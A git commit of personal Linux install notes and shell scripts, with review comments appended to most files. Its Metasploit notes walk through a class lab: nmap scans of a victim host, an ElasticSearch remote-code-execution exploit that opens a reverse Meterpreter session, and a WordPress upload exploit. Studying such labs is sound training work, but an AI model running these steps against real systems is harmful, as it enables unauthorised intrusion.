initial commit

Malin Freeborn
2020-01-02 01:04:35 +01:00
commit 6befc5d3c1
162 changed files with 19086 additions and 0 deletions


@@ -0,0 +1,59 @@
# Initial Setup
<!-- modified since testing
-->
Some of this needs executed as root, so it's probably easier to do the whole things as root.
> fdisk /dev/sdX
o,n,t,c
> mkfs.vfat /dev/sdX1
> mkdir boot
> mount /dev/sdX1 boot
Create and mount the ext4 filesystem:
> mkfs.ext4 /dev/sdX2
> mkdir root
> mount /dev/sdX2 root
Download and extract the root filesystem (as root, not via sudo):
> wget http://archlinuxarm.org/os/ArchLinuxARM-rpi-3-latest.tar.gz
> tar zxvf ArchLinuxARM-rpi-3-latest.tar.gz -C root
> sync
Move boot files to the first partition:
> mv root/boot/* boot
> Unmount the two partitions:
> umount boot root
echo belgradecats > /etc/hostname
echo "# /etc/hosts: static lookup table for host names
```
<ip-address> <hostname.domain.org> <hostname>
127.0.0.1 belgradecats.localdomain belgradecats
::1 belgradecats.localdomain belgradecats ip6-localhost
```
# End of file" > /etc/hosts
# Get audio on
echo dtparam=audio=on >> /boot/config.txt
pacman-key --init
pacman-key --populate archlinuxarm
pacman -Syyu base-devel git alsa-utils xf86-video-fbdev
timedatectl set-timezone Europe/Belgrade
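Review bot: the lines from `echo belgradecats > /etc/hostname` onward run after `umount boot root`, so they edit the host machine's /etc/hostname, /etc/hosts and /boot/config.txt rather than the Pi image; either run them against `root/` before the unmount or mark where the notes switch to the booted Pi. The `echo "# /etc/hosts: ..." > /etc/hosts` block also contains the two markdown fence lines, which would be written into the file. `> Unmount the two partitions:` is prose carrying a command prompt. The root filesystem is fetched over plain http with no integrity check; fetching over https and comparing the tarball against the published checksum before `tar zxvf` would catch a corrupted or tampered download.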


@@ -0,0 +1,130 @@
Keyboard layout changed.
> ls /usr/share/kbd/keymaps/**/*.map.gz
> loadkeys uk.map.gz
Check if boot mode is UEFI
> ls /sys/firmware/efi/efivars
Without efivars, the system must boot with BIOS.
# Check network's up
> ping archlinux.org
Set system clock properly
> timedatectl set-ntp true
Check disks
> lsblk
Make partition
> fdisk -l
- Boot: 200M
- Swap: Double Ram's a nice standard.
- \/: 15G
- Home: The rest
- var: probably doesn't need a partition, but can be nice if you're
* Worried about filling up with logs.
* Intending to fill up with torrents, which land in /var/.
parted alternative
mklabel gpt
mkpart ESP fat32 1MiB 200MiB
set 1 boot on
name 1 efi
Use pacstrap to get the base install.
> mount /dev/sda3 /mnt/
> mkdir /mnt/home
> mkdir /mnt/boot
> mount /dev/sda3 /mnt/home
> mount /dev/sda1 /mnt/boot
> pacstrap /mnt base base-devl vim
Make fstab notes for new system.
> genfstab -U /mnt >> /mnt/etc/fstab
> arch-chroot /mnt
> echo 'en_GB.UTF-8' > /etc/default/locale
> pacman -Sy networkmanager grub
> grub-install --target=i386-pc /dev/sda
> grub-mkconfig -o /boot/grub/grub.cfg
set local time
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
Find the desired locale's and uncomment them.
> vi /etc/locale.gen
> locale-gen
Make your keyboard changes permenent with:
> vi /etc/vconsole.conf
then set: `KEYMAP=uk.map.gz`
unsure about this bit - is this name just for the loadkeys function?
make a hostname
echo pc > /etc/hostname
Set hostnames for network, or at least your own.
> vi /etc/hosts
# This should have the following, at least:
127.0.0.1 localhost
::1 localhost
127.0.1.1 [hostname].localdomain [hostname]
If the system has a permanent IP address, it should be used instead of localhost.
Ping some sites to make sure the network's working
> passwd
> exit
> umount -R /mnt
Remove retarded beep sound:
> sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf
> rmmod pcspkr
# Fonts
sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono
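Review bot: `mount /dev/sda3 /mnt/` and `mount /dev/sda3 /mnt/home` mount the same partition twice; with the layout listed above (boot, swap, /, home) root and home are different partitions. `pacstrap /mnt base base-devl vim` has a typo (`base-devel`). The partition notes build a GPT label with an ESP, but `grub-install --target=i386-pc /dev/sda` is the BIOS target, which on GPT also needs a BIOS boot partition; a UEFI install wants `--target=x86_64-efi --efi-directory=/boot`. `sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf` fails because the redirection is performed by the unprivileged shell, not by sudo; use `echo "blacklist pcspkr" | sudo tee -a /etc/modprobe.d/nobeep.conf`. On Arch the locale belongs in /etc/locale.conf as `LANG=en_GB.UTF-8`, not in /etc/default/locale.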


@@ -0,0 +1,121 @@
Commands not preceded with # or $ are lines in config files.
Keyboard layout changed.
ls /usr/share/kbd/keymaps/**/*.map.gz
loadkeys uk.map.gz
Check if boot mode is UEFI
ls /sys/firmware/efi/efivars
Without efivars, the system must boot with BIOS.
Check network is up
> ping archlinux.org
Set system clock properly
> timedatectl set-ntp true
Check disks
> lsblk
Make partition
> fdisk -l
- Boot: 200M
- Swap: 12G???
- \/: 15G
- Home: The rest
parted alternative:
> mklabel gpt
> mkpart ESP fat32 1MiB 200MiB
> set 1 boot on
> name 1 efi
Use pacstrap to get the base install.
> mount /dev/sda3 /mnt/
> mkdir /mnt/home
> mkdir /mnt/boot
> mount /dev/sda3 /mnt/home
> mount /dev/sda1 /mnt/boot
> pacstrap /mnt base base-devel vim
Make fstab notes for new system.
> genfstab -U /mnt >> /mnt/etc/fstab
> arch-chroot /mnt
echo 'en_GB.UTF-8' > /etc/default/locale
pacman -Sy networkmanager grub
> grub-install --target=i386-pc /dev/sda
> grub-mkconfig -o /boot/grub/grub.cfg
set local time
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
Find the desired locale's and uncomment them.
> vi /etc/locale.gen
> locale-gen
Mkae your keyboard changes permenent with:
> vi /etc/vconsole.conf
then set: `KEYMAP=uk.map.gz`
Make a hostname
> vi /etc/hostname
This should have the following:
```
::1 localhost
127.0.1.1 [hostname].localdomain [hostname]
```
If the system has a permanent IP address, it should be used instead of localhost.
Ping some sites to make sure the network's working
> passwd
> exit
> umount -R /mnt
Remove retarded beep sound
> # echo "blacklist pcspkr" > /etc/modprobe.d/nobeep.conf
> rmmod pcspkr
## Fonts
> sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono
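Review bot: this file is a near-copy of the previous one and carries the same double mount of /dev/sda3 (`mount /dev/sda3 /mnt/` then `mount /dev/sda3 /mnt/home`) and the same BIOS `grub-install` target after a GPT/ESP layout. In addition, `vi /etc/hostname` is followed by `::1 localhost` and `127.0.1.1 [hostname].localdomain [hostname]`, which are /etc/hosts entries; /etc/hostname holds only the hostname. The `# echo "blacklist pcspkr" > /etc/modprobe.d/nobeep.conf` line is commented out, so nothing is written before `rmmod pcspkr`, and `Mkae` / `permenent` are typos.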

distros/arch/blackarch.md Normal file

@@ -0,0 +1,46 @@
## Basics
List Blackarch Packages
> sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
Install all with
> sudo pacman -S blackarch
List availalble groups with
> sudo pacman -Sg | grep blackarch | cut -d- -f2
Install a group with
> sudo pacman blackarch-$thing
e.g.
> sudo blackarch-cracker
## Install from Source
First install blackman.
> sudo pacman -S blackman
List categories:
> blackman -l
Then install all from a category with:
> sudo blackman -p [ category ]
Or install from source with:
> sudo blackman -g [ group name]
or
> sudo blackman -i [ package ]
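Review bot: `sudo pacman blackarch-$thing` and `sudo blackarch-cracker` are missing the pacman operation; both should read `sudo pacman -S blackarch-<group>` (e.g. `sudo pacman -S blackarch-cracker`). `pacman -Sg | grep blackarch | cut -d- -f2` strips the `blackarch-` prefix as intended but also truncates any group name containing a second dash (`blackarch-anti-forensic` becomes `anti`); `sed 's/^blackarch-//'` keeps the full name.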

distros/arch/blackarch.sh Normal file

@@ -0,0 +1,26 @@
#!/bin/bash
# Just tested - working fine so far.
# update
pacman -Syyu
curl -O https://blackarch.org/strap.sh
sh="$(sha1sum strap.sh)"
echo "Does $sh equal 9f770789df3b7803105e5fbc19212889674cd503 ?"
read ent
if [ ! $(echo $ent | grep -c y ) ] ; then
echo bye
exit 1
fi
chmod +x strap.sh
./strap.sh
echo Finished
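Review bot: the confirmation check `if [ ! $(echo $ent | grep -c y ) ]` never aborts: `grep -c` prints `0` or `1`, and `[ ! 0 ]` is false because `0` is a non-empty string, so strap.sh is executed as root whatever the user answers. Compare the digest in the script instead of asking: `echo "9f770789df3b7803105e5fbc19212889674cd503  strap.sh" | sha1sum -c -` and exit on a non-zero status. Pass `-f` to curl so a failed download does not leave an HTML error page that is then run, and note the date the hard-coded digest was taken, since it goes stale when BlackArch republishes strap.sh.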

distros/arch/encrypted.md Normal file

@@ -0,0 +1,94 @@
> # taken from https://0x00sec.org/t/arch-linux-with-lvm-on-luks-dm-crypt-disk-encryption-installation-guide-legacy-bios-system/1479
> # if you need wifi
> wifi-menu
> timedatectl set-ntp true
> fdisk -l
> parted /dev/sda
> (parted) mklabel msdos
> (parted) mkpart primary ext2 1MB 512MB
> (parted) mkpart primary ext4 512MB 100%
> (parted) print
> (parted) set 1 boot on
> (parted) quit
> fdisk -l
> cryptsetup luksFormat /dev/sda2
> # make a name. Here I use "crypt".
cryptsetup open /dev/sda2 crypt
> pvcreate /dev/mapper/crypt
> # now a group name - "usb"
> vgcreate usb /dev/mapper/crypt
> lvcreate -L 8GB usb -n swap
> lvcreaate -L 30G usb -n root
> lvcreate -l 100%FREE usb -n home
> mkfs.ext4 /dev/mapper/usb-home
mkfs.ext4 /dev/mapper/usb-root
> mkswap /dev/mapper/usb-swap
> mkfs.ext2 /dev/sda1
> mount /dev/mapper/usb-root /mnt
mkdir /mnt/home
> mount /dev/mapper/usb-home /mnt/home
mkdir /mnt/boot
> mount /dev/sda1 /mnt/boot
swapon /dev/mapper/usb-swap
pacstrap -i /mnt base base-devel efibootmgr grub
genfstab -U /mnt >> /mnt/etc/fstab
arch-chroot /mnt
############ new root #############
ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
# uncomment en_GT.UTF-8
> vi /etc/locale.gen
> locale-gen
> # add `LANG=en_GB.UTF-8` to /etc/locale.conf
> vi /etc/locale.conf
> echo crypt > /etc/hostname
> # make sure keyboard encrypt lvm2 are on the list of HOOKS
> vi /etc/mkinitcpio.conf
> grub-install /dev/sda
> vi /etc/default/grub
edit the GRUB_CMDLINE_LINUX=""
`GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:usb root=/dev/mapper/usb-root"`
> grub-mkconfig -o /boot/grub/grub.cfg
> mkinitcpio -p linux
> pacman -S wpa_supplicant dialog
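Review bot: two lines have typos that fail verbatim: `lvcreaate -L 30G usb -n root` (should be `lvcreate`) and the comment `# uncomment en_GT.UTF-8` (the locale set two lines later is `en_GB.UTF-8`). The guide targets a legacy BIOS system with an msdos label, so `efibootmgr` in the pacstrap line is unused. The `>` prompt prefix is also dropped on several command lines (`cryptsetup open`, `mkfs.ext4 /dev/mapper/usb-root`, both `mkdir`s, `swapon`, `pacstrap`, `genfstab`, `arch-chroot`), which makes it unclear which lines are commands.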

distros/arch/fonts.md Normal file

@@ -0,0 +1,15 @@
# Basics
Update font-cache:
> fc-cache
List fonts:
> fc-list
Grab the part of the font name you need for Xresources:
> fc-list | cut -d: -f2
Add field 3 for styles.

distros/arch/lxc.md Normal file

@@ -0,0 +1,94 @@
This is an untested mess.
# Required
> sudo pacman -S lxc arch-install-scripts dnsmasq
Place the following in /etc/default/lxc-net to configure the network:
---
# Leave USE_LXC_BRIDGE as "true" if you want to use lx
cbr0 for your
# containers. Set to "false" if you'll use virbr0 or
another existing
# bridge, or mavlan to your host's NIC.
USE_LXC_BRIDGE="true"
# If you change the LXC_BRIDGE to something other than
lxcbr0, then
# you will also need to update your /etc/lxc/default.c
onf as well as the
# configuration (/var/lib/lxc/<container>/config) for
any containers
# already created using the default config to reflect
the new bridge
# name.
# If you have the dnsmasq daemon installed, you'll als
o have to update
# /etc/dnsmasq.d/lxc and restart the system wide dnsma
sq daemon.
LXC_BRIDGE="lxcbr0"
LXC_ADDR="10.0.3.1"
LXC_NETMASK="255.255.255.0"
LXC_NETWORK="10.0.3.0/24"
LXC_DHCP_RANGE="10.0.3.2,10.0.3.254"
LXC_DHCP_MAX="253"
# Uncomment the next line if you'd like to use a conf-
file for the lxcbr0
# dnsmasq. For instance, you can use 'dhcp-host=mail1
,10.0.3.100' to have
# container 'mail1' always get ip address 10.0.3.100.
#LXC_DHCP_CONFILE=/etc/lxc/dnsmasq.conf
# Uncomment the next line if you want lxcbr0's dnsmasq
to resolve the .lxc
# domain. You can then add "server=/lxc/10.0.3.1' (or
your actual $LXC_ADDR)
# to your system dnsmasq configuration file (normally
/etc/dnsmasq.conf,
# or /etc/NetworkManager/dnsmasq.d/lxc.conf on systems
that use NetworkManager).
# Once these changes are made, restart the lxc-net and
network-manager services.
# 'container1.lxc' will then resolve on your host.
#LXC_DOMAIN="lxc"
---
Then start the lxc NAT:
> sudo systemctl start lxc-net
> sudo systemctl restart NetworkManager
... and make sure the bridge's ip-range doesn't intefere withe local network.
> sudo arp-scan -I lxcbr0 -l
The lxc template is in /etc/lxc/default.conf. You need to modify it so that it uses lxcbr0.
---
/etc/lxc/default.conf
lxc.net.0.type = veth
lxc.net.0.link = lxcbr0
lxc.net.0.flags = up
lxc.net.0.hwaddr = 00:16:3e:xx:xx:xx
---
# Making machines
> sudo lxc-create -n roach -t download -- --dist archlinux --release current --arch amd64
Arch linux containers take up about 600 Megs.
To speed up the startup process, one can install haveged and start the haveged.service. Haveged stops the wait-time for system entropy creation.
Machines are stored in /var/lib/lxc.
# Starting
> lxc-attach -n roach
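Review bot: the comment lines in the /etc/default/lxc-net block are wrapped mid-word (`lx` / `cbr0 for your`, `default.c` / `onf as well as the`), so every continuation line lacks the `#` prefix; lxc-net sources this file as shell, and a bare line such as `cbr0 for your` would be run as a command. Restore each comment to a single `#` line. Under `# Starting`, `lxc-attach -n roach` only attaches to an already running container; `lxc-start -n roach` has to come first. The note about the bridge's IP range clashing with the local network is the right caveat, but `arp-scan -I lxcbr0 -l` only sees hosts on the bridge, so compare 10.0.3.0/24 against `ip addr` on the host's LAN interface as well.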

distros/arch/pacman.md Normal file

@@ -0,0 +1,31 @@
Packages are kept in /var/cache/pacman/pkg.
Delete unused old packages with:
> sudo pacman -Sc
Signatures are handled by the pacman-key, initially set up with:
> sudo pacman-key --populate archlinux
And refreshed with:
sudo pacman-key --refresh-keys
If you have usigned keys, you can refresh with:
> sudo pacman -Sc
or
> sudo pacman -Scc
Reset all keys with:
> sudo rm -r /etc/pacmand.d/gnupg/ && sudo pacman-key --init
If you're constantly getting 'everything corrupted, nothing upgraded', try running:
> sudo pacman -S archlinux-keyring
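Review bot: `sudo rm -r /etc/pacmand.d/gnupg/` has a typo in the path (`/etc/pacman.d/gnupg/`), and after `pacman-key --init` the keyring must be repopulated with `pacman-key --populate archlinux`, otherwise every signature check fails. 'If you have usigned keys, you can refresh with: sudo pacman -Sc' is misleading: `-Sc` and `-Scc` clear the package cache (already covered by 'Delete unused old packages') and do nothing to keys; refreshing keys is the `pacman-key --refresh-keys` line above, which is also missing its `>` prefix.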

distros/arch/perl.zip Normal file

Binary file not shown.


@@ -0,0 +1,37 @@
> yay -S pi-hole-server pi-hole-ftl
> sudo systemctl disable systemd-resolved
> sudo systemctl stop systemd-resolved
> sudo systemctl enable pi-hole-server pihole-FTL
> sudo systemctl start pi-hole-server pihole-FTL
Remove that google dns server.
> pihole -a setdns 1.1.1.1 1.0.0.1
Disable pihole password by setting a blank password.
> pihole -a -p
# Configure cloudflare DNS
> yay -S cloudflared-bin
echo "proxy-dns: true
proxy-dns-upstream:
- https://1.0.0.1/dns-query
- https://1.1.1.1/dns-query
- https://2606:4700:4700::1111/dns-query
- https://2606:4700:4700::1001/dns-query
proxy-dns-port: 5053
proxy-dns-address: 0.0.0.0" > /etc/cloudflared/cloudflared.yml
echo "
PRIVACYLEVEL=0
IGNORE_LOCALHOST=no
AAAA_QUERY_ANALYSIS=yes
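Review bot: the final `echo "` block (`PRIVACYLEVEL=0`, `IGNORE_LOCALHOST=no`, `AAAA_QUERY_ANALYSIS=yes`) is never closed or redirected, so the file ends mid-command; it needs the closing quote and the target file (these are pihole-FTL.conf settings). The cloudflared config listens on `proxy-dns-address: 0.0.0.0`, which exposes the DoH proxy on every interface; `127.0.0.1` is enough when only the local Pi-hole uses it. It is also never used: `pihole -a setdns 1.1.1.1 1.0.0.1` points Pi-hole straight at Cloudflare's plain-DNS resolvers instead of at the local cloudflared on port 5053 (`127.0.0.1#5053`). Lastly, `pihole -a -p` with a blank password leaves the admin interface unauthenticated for anyone on the LAN, which should be stated as a deliberate choice.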

distros/arch/problems.md Normal file

@@ -0,0 +1,5 @@
Broken Xorg
> sudo X -configure


@@ -0,0 +1,47 @@
#!/bin/bash
# https://www.unixmen.com/install-arch-linux-raspberry-pi/
pacman-key --init || echo init fail >> log
pacman-key --populate archlinuxarm || echo update fail >> log
pacman -Syyuu || echo update fail >> log
sed -i s/#en_GB.UTF-8 UTF-8/en_GB.UTF-8 UTF-8/ /etc/locale.gen
echo 'LANG=en_GB.UTF-8' >> /etc/locale.conf
locale-gen
pacman -S base-devel htop ranger tmux lolcat fortune-mod texlive-most darkhttpd git figlet rxvt-unicode task timew calcurse fail2ban
if [[ $2 == all || $1 == all ]]; then
pacman -S nnn feh dmenu rofi xf86-video-fbdev xorg xorg-xinit xorg-server xorg-server-utils xterm
fi
# Audio
echo 'dtparam=audio=on' >> /boot/config.txt
if [[ $1 == audio ]]; then
pacman -S alsa-utils alsa-firmware alsa-lib alsa-plugins
fi
echo 'device_tree_param=spi=on' >> /boot/config.txt
# for a vnc viewer
if [[ $1 == vnc ]]; then
tigervnc gcc geany i3 i3status compton feh sxiv rxvt-unicode
fi
# Swap
cd /var/cache/swap
sudo dd if=/dev/zero of=swapfile bs=1K count=2M
sudo chmod 600 swapfile
sudo mkswap swapfile
sudo swapon swapfile
echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab
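Review bot: `sed -i s/#en_GB.UTF-8 UTF-8/en_GB.UTF-8 UTF-8/ /etc/locale.gen` is unquoted, so the shell splits the expression at the spaces and sed receives `s/#en_GB.UTF-8` as its script; quote it: `sed -i 's/#en_GB.UTF-8 UTF-8/en_GB.UTF-8 UTF-8/' /etc/locale.gen`. In the vnc branch, `tigervnc gcc geany i3 i3status ...` is missing `pacman -S`. `cd /var/cache/swap` has no preceding `mkdir -p`, and if the `cd` fails the `dd` writes a 2 GiB swapfile into whatever the current directory is; use `mkdir -p /var/cache/swap && cd /var/cache/swap || exit 1`. The script already requires root for pacman, so the `sudo` on the swap lines is inconsistent with the rest, and `>> log` writes to a relative path.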


@@ -0,0 +1,8 @@
#!/bin/bash
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam


@@ -0,0 +1,16 @@
#!/bin/bash
# This has been changed since testing.
yay -S pi-hole-ftl pi-hole-server
# Configuration in /etc/pihole/pihole-FTL.db
# You can change DBINTERVAL to 60 or more to limit writes to disk
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo systemctl start pihole-FTL
pihole -g || echo '' ; echo 'Your pihole is gubbed' ; exit 1
pihole -c
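Review bot: `pihole -g || echo '' ; echo 'Your pihole is gubbed' ; exit 1` does not do what the author intends: `;` separates commands unconditionally, so the error message and `exit 1` run even when `pihole -g` succeeds, and `pihole -c` is never reached. Group the failure path: `pihole -g || { echo 'Your pihole is gubbed'; exit 1; }`. The comment `# Configuration in /etc/pihole/pihole-FTL.db` names the query database; FTL's settings, including DBINTERVAL, live in /etc/pihole/pihole-FTL.conf.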


@@ -0,0 +1,8 @@
#!/bin/bash
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam


@@ -0,0 +1,10 @@
git clone https://aur.archlinux.org/yay.git
cd yay
makepkg -si
yay -S perl-graph-easy signal-desktop sc-im ncpamixer xdg-utils-mimeo
yay -S ttf-tengwar-annatar
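Review bot: this file has no `#!/bin/bash` line, unlike the other scripts in the commit, and `makepkg -si` refuses to run as root while needing sudo for the install step, so it should say it is run as an ordinary user. Building yay and the listed AUR packages means compiling user-submitted PKGBUILDs; the script could at least print the PKGBUILD (`makepkg --printsrcinfo` or `less PKGBUILD`) before `makepkg -si` so the reader sees what is about to be built.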

distros/arch/steam.sh Normal file

@@ -0,0 +1,10 @@
#!/bin/bash
sudo pacman -S flatpak
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam
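Review bot: this is the third copy of the same flatpak/Steam block in this commit; the two earlier unnamed copies lack the `sudo pacman -S flatpak` line, so keep this one and drop the others.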

distros/debian/apt.md Normal file

@@ -0,0 +1,22 @@
# Problems
## apt
### Configurations?
Fucked up a package's configuration files?
> sudo apt-get purge [thing]
> sudo apt autoremove
Check if you still have related things:
> apt search [thing]
> sudo apt-get install [ thing ]
Still have problems?
> sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing]
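Review bot: `sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing]` has a typo (`dpkg`), and the argument must be the cached `.deb` file, e.g. `/var/cache/apt/archives/[thing]_[version]_[arch].deb`, not a bare package name. It would help to state that `apt-get purge` is the step that actually removes the package's configuration files, since that is the point of the section.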


@@ -0,0 +1,5 @@
# Videos not working
> sudo apt-get install lubuntu-restricted-extras


@@ -0,0 +1,87 @@
cd /usr/share/X11/xkb/symbols/
cp pc pc.bak
echo "pc backup copied - this isn't tested" >> ~/install.log
sed s/Caps_Lock/Escape/ pc > pc
cd
echo "deb https://dl.bintray.com/hawkeye116477/waterfox-deb release main" | sudo tee -a /etc/apt/sources.list
curl https://bintray.com/user/downloadSubjectPublicKey?username=hawkeye116477 | sudo apt-key add -
sudo apt-get update && sudo apt-get install waterfox
echo "deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/sources.list
setxkbmap gb
# gksudo firefox -install-global-extension addon-1865-latest.xpi
#install addon with cli
apt-get -y install openvpn
cd /etc/openvpn
sudo wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
unzip ovpn.zip
rm ovpn.zip
sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome
wget https://github.com/maestrogerardo/i3-gaps-deb/archive/master.zip
echo "if you don't have openvpn options in your gnome desktop, this just isn't going to work. Get the openvpn manager, called 'openvpn-service-gnome' or some such" >> ~/*log
unzip ma*
rm ma*zip
cd i3-g*
sudo apt -y update;sudo apt -y upgrade
./i3*
cd
mv i3/ .config
sudo apt install feh compton ranger w3m cmus scrot
sudo apt install tor
wget https://github.com/dpayne/cli-visualizer/archive/master.zip
echo "If vis is playing funny-buggers, enter the install files and input the commands manually. May be an architecture problem as I don't have arm cpu" >> *log
unzip master.zip
rm master.zip
cd cli-vis*
apt install libfftw3-dev libncursesw5-dev libpulse-dev
./install.sh
cd
mkdir Images;mkdir Images/Wallpapers;mkdir Images/Screenshots
apt install -y encfs cmatrix cowsay
mkdir Tools
cd Tools
wget https://github.com/Mebus/cupp/archive/master.zip
unzip master.zip;rm master.zip
cd
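Review bot: `sed s/Caps_Lock/Escape/ pc > pc` empties the file: the shell truncates `pc` for the redirection before sed reads it, so the result is a zero-byte keymap and `pc.bak` is the only surviving copy. Use `sed -i s/Caps_Lock/Escape/ pc`. The block appending the Kali repositories to /etc/apt/sources.list is the more serious problem: mixing `kali`, `kali-dev` and `wheezy` lines into a non-Kali Debian or Ubuntu install pulls in a different package set and is a well-known way to break a system, and nothing in the script installs the Kali archive key, so apt will refuse those plain-http sources or, if forced, cannot verify anything it installs from them. Also, `echo ... >> /etc/apt/sources.list` has no sudo, `curl ... | sudo apt-key add -` lacks `-f`, and `apt-get -y install openvpn` / `apt install ...` run without sudo while neighbouring lines use it.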

distros/kali/metasploit.md Normal file

@@ -0,0 +1,124 @@
> service postgresql start
> systemctl status postgresql
> msfdb init
start the metasploit
> msfconfole
show exploits
Examples:
> info exploit/something
> search cve:2019
## Basic theory
There are vulnerabilities and payloads.
Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells.
You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you.
# Notes for Class
Victim: 172.18.3.26
> nmap -Pn -sV 172.18.3.26 --script=vuln
> nmap -Pn -sV 172.18.3.26
Output:
```
Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
Nmap scan report for 172.18.3.26
Host is up (0.016s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
4848/tcp open appserv-http?
8022/tcp open oa-system?
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8383/tcp open ssl/m2mservices?
9200/tcp open tcpwrapped
49153/tcp open unknown
49154/tcp open unknown
49159/tcp open unknown
49161/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
Note this one:
`9200/tcp open tcpwrapped`
Apparently that's 'elasticsearch', so in metasploit we can do:
`search elasticsearch`
```
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility
1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal
2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution
3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass
4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
```
If you want to use 2, `use 2` or `use/multi/ela` then tab out.
> show options
> set rhost 172.18.3.26
The remote port's already set at this point.
We've so far done use, rhost, and port.
> exploit
```
[*] Started reverse TCP handler on 172.18.3.112:4444
[*] Trying to execute arbitrary Java...
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[*] Sending stage (53845 bytes) to 172.18.3.26
[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
```
> dir
# Next Wordpress
http://172.18.3.26:8585/wordpress/
Back to normal shell.
> search wordpress ninja
> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
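Review bot: `msfconfole` under 'start the metasploit' is a typo for `msfconsole`, and `use/multi/ela` should be `use multi/ela` followed by tab completion (the `use` command takes a space). 'We've so far done use, rhost, and port' should say `rport` to match the field name `show options` prints. The `search wordpress ninja` / `use exploit/multi/http/...` lines at the end are not followed by the `show options` / `set rhost` steps the earlier module needed, so a reader following the notes will not know the same sequence applies.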


@@ -0,0 +1,8 @@
https://coldwallet.io/
https://www.it-vn.com/2019/07/configure-ssh-to-avoid-from-shodan-and.html
https://wickr.com
https://weleakinfo.com/


@@ -0,0 +1,11 @@
> cd /etc/yum.repos.d/
> vim public.yum*
These are branches of the same Oracle server.
The first - 'latest' - is enabled by default.
You can change 'enabled' from 0 to 1 for various repositories.

distros/redhat/npm.md Normal file

@@ -0,0 +1,11 @@
package.json is the basic configuration file.
Everything is per-directory.
> npm install x
This'll install x in the current directory.
> npm init
> npm install express --save

distros/redhat/yum.md Normal file

@@ -0,0 +1,22 @@
# Overview
Forks include CentOS, scientific Linux, Oracle, and Fedora.
Major features: reliable, shit package selection.
# Basically yum
> yum search [package]
> yum list openssh
> yum install [package1] [package2]
> yum check-updates
> yum update
yum remove [package1] [package2]
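Review bot: `yum check-updates` is not a yum subcommand; it is `yum check-update` (singular). `yum remove [package1] [package2]` is also missing the `>` prefix the other command lines carry.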


@@ -0,0 +1,8 @@
Nothing interesting.
1. Install
2. Set a dns resolver in /etc/resolv.conf (`nameserver 1.1.1.1` works)
3. Enable NetworkManager
3. zypper install http-something php5 apache2
4. vi /srv/www/htdocs/index.html
5. Enable apache2
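Review bot: the numbered list has two items numbered 3 (`Enable NetworkManager` and `zypper install ...`); renumber them 3 to 6. `http-something` in the zypper line is a placeholder standing in for a real package name and should be flagged as such so nobody pastes it.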

distros/void/autologin Normal file

@@ -0,0 +1,43 @@
# Automatic Login On TTY1
Create a new autologin service:
